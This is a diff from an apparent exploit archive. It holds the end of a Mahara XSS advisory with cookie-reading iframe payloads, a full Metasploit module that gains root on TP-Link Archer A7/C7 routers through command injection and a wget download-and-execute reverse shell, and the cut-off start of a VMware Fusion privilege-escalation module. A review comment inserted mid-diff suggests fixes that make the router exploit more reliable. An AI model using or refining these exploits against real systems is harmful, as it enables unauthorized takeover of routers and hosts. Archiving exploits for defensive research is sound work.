+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& 
+files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& +files_filebrowser_edit_title=>"<iframe src=evil.source +onload=alert(document.cookie)></iframe> >"<iframe src=evil.source +onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe +src=evil.source onload=alert(document.cookie)></iframe> +>"<iframe src=evil.source +onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& +files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& +files_filebrowser_edit_licensor=>"<iframe src=evil.source +onload=alert(document.cookie)></iframe> >"<iframe src=evil.source +onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe +src=evil.source onload=alert(document.cookie)></iframe> +>"<iframe src=evil.source +onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on& +files_filebrowser_update[7191]=Guardar +cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 +- +POST: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2- +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +- +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br 
+Content-Type: multipart/form-data; +boundary=---------------------------126319663526561351602937008964 +Content-Length: 3721 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& +files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& +sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 +- +GET: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2 + + +Reference(s): +https://mahara_cms.localhost:8080/artefact/ +https://mahara_cms.localhost:8080/artefact/file/ +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file 
diff --git a/exploits/linux_mips/remote/48331.rb b/exploits/linux_mips/remote/48331.rb
new file mode 100755
index 000000000..c4a71c239
--- /dev/null
+++ b/exploits/linux_mips/remote/48331.rb
@@ -0,0 +1,391 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution', + 'Description' => %q{ + This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on + the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726. + The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does + not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command + as root, including downloading and executing a binary from another host. + This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + + Radek Domanski). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module + 'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'], + [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'], + [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'], + [ 'CVE', '2020-10882'], + [ 'CVE', '2020-10883'], + [ 'CVE', '2020-10884'], + [ 'ZDI', '20-334'], + [ 'ZDI', '20-335'], + [ 'ZDI', '20-336' ] + ], + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'Payload' => {}, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp', + 'WfsDelay' => 15, + }, + 'Targets' => + [ + [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ] + ], + 'DisclosureDate' => "Mar 25 2020", + 'DefaultTarget' => 0, + ) + ) + register_options( + [ + Opt::RPORT(20002) + ]) + + register_advanced_options( + [ + OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15]) + ]) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/webpages/app.1564127413977.manifest', + 'method' => 'GET', + 'rport' => 80 + }) + + if res && res.code == 200 + return Exploit::CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + pass + end + return Exploit::CheckCode::Unknown + end + + def calc_checksum(packet) + # reference table used to calculate the packet checksum + # used by tdpd_pkt_calc_checksum (0x4037f0) + # located at offset 0x0416e90 in the binary + reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee, + 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4, + 0x8f, 0xe9, 0x63, 
0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79, + 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c, + 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d, + 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41, + 0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83, + 0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9, + 0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa, + 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10, + 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b, + 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8, + 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32, + 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d, + 0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf, + 0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95, + 0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6, + 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c, + 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01, + 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85, + 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78, + 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98, + 0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6, + 0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30, + 0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82, + 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 
0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9, + 0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15, + 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61, + 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a, + 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4, + 0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda, + 0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c, + 0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe, + 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85, + 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29, + 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d, + 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed, + 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2, + 0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73, + 0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a, + 0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a, + 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3, + 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80, + 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b, + 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9, + 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e, + 0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f, + 0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06, + 0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 
0xaf, 0x0a, 0x1b, 0x4c, 0x36, + 0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf, + 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc, + 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77, + 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5, + 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a, + 0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b, + 0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3, + 0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72, + 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a, + 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5, + 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2, + 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81, + 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47, + 0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11, + 0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff, + 0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e, + 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16, + 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9, + 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae, + 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd, + 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3, + 0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23, + 0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 
0x68, 0x1b, + 0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a, + 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d] + + res = 0xffffffff + + # main checksum calculation + packet.each_entry { |c| + index = ((c ^ res) & 0xff) * 4 + # .reverse is needed as the target is big endian + ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first) + res = ref ^ (res >> 8) + } + + checksum = ~res + checksum_s = [(checksum)].pack('I>').force_encoding("ascii") + + # convert back to string + packet = packet.pack('C*').force_encoding('ascii') + + # and replace the checksum + packet[12] = checksum_s[0] + packet[13] = checksum_s[1] + packet[14] = checksum_s[2] + packet[15] = checksum_s[3] + + packet + end + + def aes_encrypt(plaintext) + # Function encrypts perfectly 16 bytes aligned payload + + if (plaintext.length % 16 != 0) + return + end + + cipher = OpenSSL::Cipher.new 'AES-128-CBC' + # in the original C code the key and IV are 256 bits long... but they still use AES-128 + iv = "1234567890abcdef" + key = "TPONEMESH_Kf!xn?" + encrypted = '' + cipher.encrypt + cipher.iv = iv + cipher.key = key + + # Take each 16 bytes block and encrypt it + plaintext.scan(/.{1,16}/) { |block| + encrypted += cipher.update(block) + } + + encrypted + end + + def create_injection(c) + # Template for the command injection + # The injection happens at "slave_mac" (read advisory for details) + # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions. + + # This will fail if we send a command with single quotes (') + # ... but that's not a problem for this module, since we don't use them for our command. + # It might also fail with double quotes (") since this will break the JSON... 
+ inject = "\';printf \'#{c}\'>>#{@cmd_file}\'" + + template = "{\"method\":\"slave_key_offer\",\"data\":{"\ + "\"group_id\":\"#{rand_text_numeric(1..3)}\","\ + "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\ + "\"slave_mac\":\"%{INJECTION}\","\ + "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\ + "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\ + "\"want_to_join\":false,"\ + "\"model\":\"#{rand_text_alpha(5..13)}\","\ + "\"product_type\":\"#{rand_text_alpha(5..13)}\","\ + "\"operation_mode\":\"A%{PADDING}\"}}" + + # This is required to calculate exact template length without replace flags + template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length + # This has to be initialized to cover the situation when no padding is needed + pad = '' + padding = rand_text_alpha(16) + + template_len += inject.length + + # Calculate pad if padding is needed + if (template_len % 16 != 0) + pad = padding[0..15-(template_len % 16)] + end + + # Here the final payload is created + template % {INJECTION:"#{inject}", PADDING:"#{pad}"} + end + + def update_len_field(packet, payload_length) + new_packet = packet[0..3] + new_packet += [payload_length].pack("S>") + new_packet += packet[6..-1] + end + + def exec_cmd_file(packet) + # This function handles special action of exec + # Returns new complete tpdp packet + inject = "\';sh #{@cmd_file}\'" + payload = create_injection(inject) + + ciphertext = aes_encrypt(payload) + if not ciphertext + fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") + end + + new_packet = packet[0..15] + new_packet += ciphertext + new_packet = update_len_field(new_packet, ciphertext.length) + + calc_checksum(new_packet.bytes) + end + + # Handle incoming requests from the router + def on_request_uri(cli, request) + print_good("#{peer} - Sending executable to the router") + print_good("#{peer} - Sit back and relax, Shelly will come visit 
soon!") + send_response(cli, @payload_exe) + @payload_sent = true + end + + def exploit + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST") + end + + if datastore['SSL'] + fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it") + end + + print_status("Attempting to exploit #{target.name}") + + tpdp_packet_template = + [0x01].pack('C*') + # packet version, fixed to 1 + [0xf0].pack('C*') + # set packet type to 0xf0 (onemesh) + [0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table + [0x00].pack('S>*') + # packet len + [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function + [0x00].pack('C*') + # dunno what this is + [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value + [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder + + srv_host = datastore['SRVHOST'] + srv_port = datastore['SRVPORT'] + @cmd_file = rand_text_alpha_lower(1) + + # generate our payload executable + @payload_exe = generate_payload_exe + + # Command that will download @payload_exe and execute it + download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}" + + http_service = 'http://' + srv_host + ':' + srv_port.to_s + print_status("Starting up our web service on #{http_service} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => "/#{@cmd_file}" + }}) + + print_status("#{peer} - Connecting to the target") + connect_udp + + print_status("#{peer} - Sending command file byte by byte") + print_status("#{peer} - Command: #{download_cmd}") + mod = download_cmd.length / 5 + + download_cmd.each_char.with_index { |c, index| + # Generate payload + payload = create_injection(c) + if not payload + fail_with(Failure::Unknown, "#{peer} - Failed to setup 
download command!") + end + + # Encrypt payload + ciphertext = aes_encrypt(payload) + if not ciphertext + fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") + end + + tpdp_packet = tpdp_packet_template.dup + tpdp_packet += ciphertext + tpdp_packet = update_len_field(tpdp_packet, ciphertext.length) + tpdp_packet = calc_checksum(tpdp_packet.bytes) + + udp_sock.put(tpdp_packet) + + # Sleep to make sure the payload is processed by a target + Rex.sleep(1) + + # Print progress + if ((index+1) % mod == 0) + percentage = 20 * ((index+1) / mod) + # very advanced mathemathics in use here to show the progress bar + print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]") + if percentage == 100 + # a bit of cheating to get the last char done right + index = -2 + end + #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}") + end + } + + # Send the exec command. From here we should receive the connection + print_status("#{peer} - Command file sent, attempting to execute...") + tpdp_packet = exec_cmd_file(tpdp_packet_template.dup) + udp_sock.put(tpdp_packet) + + timeout = 0 + while not @payload_sent + Rex.sleep(1) + timeout += 1 + if timeout == datastore['MAX_WAIT'].to_i + fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(") + end + end + + disconnect_udp + end +end \ No newline at end of file diff --git a/exploits/macos/local/48337.rb b/exploits/macos/local/48337.rb new file mode 100755 index 000000000..ceca93f31 --- /dev/null +++ b/exploits/macos/local/48337.rb 
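Review bot: The `rescue ::Rex::ConnectionError` clause in `check` runs `pass`, which is not a Ruby no-op: unless one of the included mixins defines a `pass` method (none is visible here), a refused or dropped connection raises `NameError` from inside the rescue instead of falling through to `Exploit::CheckCode::Unknown`. An empty rescue body, or `rescue ::Rex::ConnectionError => e` followed by `vprint_error(e.message)`, gives the intended behaviour. The same method returns `CheckCode::Vulnerable` on a 200 for a static manifest path, which only fingerprints the firmware build; `CheckCode::Appears` is arguably the honest verdict for that evidence. In `exploit`, the download wait compares `timeout == datastore['MAX_WAIT'].to_i`, so a MAX_WAIT of 0 or a negative value never terminates the loop; `if timeout >= datastore['MAX_WAIT'].to_i` bounds it for every setting.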
@@ -0,0 +1,240 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::OSX::Priv + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation', + 'Description' => %q( + This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3. + The Open VMware USB Arbitrator Service can be launched outide of its standard path + which allows loading of an attacker controlled binary. By creating a payload in the + user home directory in a specific folder, and creating a hard link to the 'Open VMware + USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload + with an effective UID of 0. + @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race. + Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3. 
+ ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die', # msf module + 'Dhanesh Kizhakkinan', # discovery + 'Rich Mirch', # edb module + 'jeffball <jeffball@dc949.org>', # 11.5.3 exploit + 'grimm' + ], + 'Platform' => [ 'osx' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'CVE', '2020-3950' ], + [ 'EDB', '48235' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ], + [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ], + [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ] + ], + 'DisclosureDate' => 'Mar 17 2020', + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + 'WfsDelay' => 15 + } + ) + ) + + register_options [ + OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75]) + ] + + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ] + end + + def open_usb_service + 'Open VMware USB Arbitrator Service' + end + + def usb_service + 'VMware USB Arbitrator Service' + end + + def get_home_dir + home = cmd_exec 'echo ~' + if home.blank? + fail_with Failure::BadConfig, 'Unable to determine home dir for shell.' + end + home + end + + def content_dir + "#{get_home_dir}/Contents" + end + + def base_dir + "#{content_dir}/Library/services/" + end + + def kill_process(executable) + pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}') + cmd_exec pid_kill + end + + def get_version + # Thanks to @ddouhine on github for this answer! 
+ version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString" + /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2 + if version_raw.blank? + fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.' + end + Gem::Version.new(version) + end + + def pre_11_5_3 + # Upload payload executable & chmod + payload_filename = "#{base_dir}#{usb_service}" + print_status "Uploading Payload: #{payload_filename}" + write_file payload_filename, generate_payload_exe + chmod payload_filename, 0o755 + register_file_for_cleanup payload_filename + + # create folder structure and hard link to the original binary + root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later + link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/" + cmd_exec "mkdir -p #{link_folder}" + cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' 